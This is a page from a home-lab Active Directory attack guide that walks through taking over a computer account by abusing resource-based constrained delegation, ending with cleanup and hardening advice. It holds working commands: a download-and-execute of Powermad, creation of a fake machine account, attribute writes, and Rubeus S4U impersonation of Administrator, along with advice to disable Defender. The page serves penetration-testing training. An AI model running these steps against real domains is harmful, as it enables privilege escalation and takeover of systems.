📖
Building a Windows AD lab
  • Building a Windows AD lab
  • Lab-setup
    • Lab overview
    • Building the lab
      • Prerequisite
      • Creating images
        • Optional: Install software & Settings
      • Network setup
      • Cloning & Creating VM's
      • Creating bank.local
        • Creating Domain Controller - DC01
          • Enable RDP
        • Creating amsterdam.bank.local
          • Creating Domain Controller - DC02
            • Creating a AD structure
            • Create a CA
            • Configure LDAPS
          • Creating Fileserver - FILE01
            • File services
          • Creating W10 client - WS01
            • PSRemoting
          • Creating Webserver - WEB01
            • Web Services
            • SQL Server
              • Create database
      • Creating secure.local
        • Creating Domain Controller - DC03
        • Creating File/SQL Server - DATA01
          • SQL Server
            • Create database
    • Attack Paths
      • Attack path 1 (hard)
        • Configuring
        • Tasks
        • Manual
      • Attack path 2
        • Configuring
        • Task
        • Manual
    • Troubleshooting
    • To-Do
  • Vulnerabilities & Misconfigurations & Attacks
    • Initial Access Attacks
      • Username Enumeration
        • Password Spraying
        • AS-REP Roasting
        • Empty Password
      • SMB Relaying
      • SMB Null-Session (To-Do)
      • SQL Server default login
    • Active Directory Attacks
      • Password spraying
      • AS-REP Roasting
      • Empty password
      • Password in description
      • Kerberoasting
      • Delegation Attacks
        • Unconstrained Delegation
          • Printerbug
        • Constrained Delegation
        • Resource Based Constrained Delegation
          • Computeraccount Takeover
          • Change-LockScreen
          • Webclient Attack (todo)
      • DACL-Abuses
        • Write Owner
        • Owns
        • WriteDacl
        • GenericAll
        • GenericWrite (todo)
        • ForceChangePassword
        • Add user to group (todo)
        • Targeted Kerberoast (todo)
        • Get-Changes
      • Reused local administrator (todo)
      • SQL Server Attacks (todo)
        • Initial Access
          • SQL Server default login
          • Normal domain user access
        • Privilege Escalation
          • Impersonation
          • DB-Owner
          • Enumerate Logins
            • Weak passwords
        • Executing Commands
        • Database-Links
        • Capturing hashes & Relaying
      • Reading LAPS passwords (todo)
      • Priviliged Groups (todo)
        • DNS-Admins (todo)
        • Account Operators (todo)
        • Backup Operators
        • Server Operators (todo)
      • Hopping domains and forests
        • Child to parent domain
          • Krbtgt hash
          • Trust key
        • Cross forest Attacks (todo)
          • Foreign user
    • Misc
      • Reverse shell trick
      • Lateral Movement
        • PSRemoting
        • PsExec (todo)
      • Misconfigured Service (todo)
        • Unqouted Service Path
      • Discovering Shares
      • Password on shares
      • Different methods of dumping credentials
        • LSASS (todo)
        • Dumping DPAPI
          • Browser passwords
        • Scheduled tasks (todo)
        • Services (todo)
        • Vssadmin Shadow Copy
      • ms-ds-machineaccountquota (todo)
      • add DNS Records (todo)
      • Bypassing UAC
    • Template page
  • Defence
    • Detection
    • Hardening
      • LDAP
        • LDAP Signing
        • LDAPS Binding
      • Strong Password Policy
      • Change who can join computers to the domain
      • Protected users group
      • Account is sensitive and cannot be delegated
      • Powershell Execution Policy
      • Template page
Powered by GitBook
On this page
  • Configuring
  • Prerequisite
  • Configuring
  • Attacking
  • How it works
  • Tools
  • Executing the attack
  • Cleanup
  • Defending
  • Recommendations
  • Detection
  • References
Edit on GitHub
  1. Vulnerabilities & Misconfigurations & Attacks
  2. Active Directory Attacks
  3. Delegation Attacks
  4. Resource Based Constrained Delegation

Computeraccount Takeover

If you have GenericAll or GenericWrite rights to a computer object you can write to the attribute msds-AllowedToActOnBehalfOfOtherIdentity and the abuse the delegation to take over the system

PreviousResource Based Constrained DelegationNextChange-LockScreen

Last updated 2 years ago

Configuring

Prerequisite

Configuring

Nothing need to be configured to abuse this since we set the GenericAll permissions during the "Owns" section. If you would like to configure this it can be configured the same way as we configured "Write Owner".

Attacking

How it works

If you have GenericAll or GenericWrite rights to a computer object you can write to the attribute msds-AllowedToActOnBehalfOfOtherIdentity. If you control this attribute you can impersonate and authenticate as any domain user to the computer. Resulting in getting access to the computer as long as you can impersonate a user that has access too it. Users with the flag "This account is senstitive and cannot be delegated" or members of the "Protected Users Group" can't be impersonated.

Tools

Executing the attack

Prereqesuite

  • An account with a SPN associated (or able to add new machines accounts (default value this quota is 10))

  • A user with write privileges over the target computer which doesn't have msds-AllowedToActOnBehalfOfOtherIdentity

Executing the attack

  1. It is expected that the GenericAll permissions during the ACL abuses "Write Owner" and "Owns" are set for the sa_sql user. This attack will continue from there:

2. First we will check that the target doesn't have the msds-AllowedToActOnBehalfOfOtherIdentity attribute set.

Get-DomainComputer -Domain secure.local -Credential $creds -Server 10.0.0.100 Data01 | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentity

The attribute haven't been set yet.

3. Add the following to the /etc/hosts file on Kali otherwise the Crackmapexec command will fail:

10.0.0.100 secure.local
10.0.0.100 dc03
10.0.0.100 dc03.secure.local

4. Check if we can add computers to the domain since its a requirement for the attack. We can get the machine account qouta from the domain with Crackmapexec:

crackmapexec ldap 10.0.0.100 -u sa_sql -p Iloveyou2 -M MAQ

The machine account qouta is 10, meaning we (all authenticated users) can create our own computerobject in the domain.

5. Create a machine account with the name FAKE01 and password 123456 with PowerMad:

iex (iwr http://192.168.248.2:8090/Powermad.ps1 -usebasicparsing)
New-MachineAccount -Domain secure.local -Credential $creds -DomainController 10.0.0.100 -MachineAccount FAKE01 -Password $(ConvertTo-SecureString '123456' -AsPlainText -Force) -Verbose

6. Get the SID of the computerobject we created:

Get-DomainComputer fake01 -Domain secure.local -Credential $creds -Server 10.0.0.100

7. Now we need to create the raw security descriptor which we then will write to the attribute:

$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1498997062-1091976085-892328878-1108)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)

Make sure you changed the SID since it can differ in your lab.

8. Now we can write as sa_sql to the msds-allowedtoactonbehalfofotheridentity attribute of the computerobject DATA01:

Get-DomainComputer DATA01 -Domain secure.local -Credential $creds -Server 10.0.0.100 | Set-DomainObject -Domain secure.local -Credential $creds -Server 10.0.0.100 -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

9. Seems like it worked, now we can check the value of the msds-AllowedToActOnBehalfOfOtherIdentity attribute by saving it in a variable and doing some powershell confu to decrypt it:

$RawBytes = Get-DomainComputer DATA01 -Domain secure.local -Credential $creds -Server 10.0.0.100 -Properties 'msds-allowedtoactonbehalfofotheridentity' | Select-Object -ExpandProperty msds-allowedtoactonbehalfofotheridentity
(New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0).DiscretionaryAcl
Get-DomainComputer -Domain secure.local -Credential $creds -Server 10.0.0.100 <SID>

10. FAKE01 can impersonate any user now to DATA01. To do this we first need to calculate the NTLM hash for the FAKE01 password, we can do this with Rubeus.

.\Rubeus.exe hash /password:123456 /user:fake01 /domain:secure.local

Temporarily disable Windows Defender if it gets flagged by it.

11. The next step is to run Rubeus to impersonate the Administrator user using the FAKE01 Computeraccount. Abusing Resource Based Constrained Delegation. We will request a CIFS ticket so we can list the C disk.

.\Rubeus.exe s4u /domain:secure.local /dc:10.0.0.100 /user:fake01 /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:Administrator /msdsspn:CIFS/data01.secure.local /ptt

12. We got a CIFS ticket as Administrator for data01.secure.local, now we can try to list the C disk.

Cleanup

  1. Login to DC03 as Administrator with the password Welcome01!.

  2. Execute the following command to remove the msDS-AllowedToActOnBehalfOfOtherIdentity attribute from DATA01.

Set-ADComputer -PrincipalsAllowedToDelegateToAccount $null -Identity data01

3. Execute the following command to remove the FAKE01 computer we created:

Get-ADComputer fake01 | Remove-ADObject

Defending

Recommendations

  • Change who can add computers to the domain.

  • Add privileged users to the protected users group.

  • Add the flag "Account is sensitive and cannot be delegated".

Detection

References

Owns
PowerMad
Invoke-DNSUpdate
Owns
Change who can join computers to the domain
Protected users group
Account is sensitive and cannot be delegated
GitHub - Kevin-Robertson/Powermad: PowerShell MachineAccountQuota and DNS exploit toolsGitHub
Powermad/Invoke-DNSUpdate.ps1 at master · Kevin-Robertson/PowermadGitHub
Logo
Logo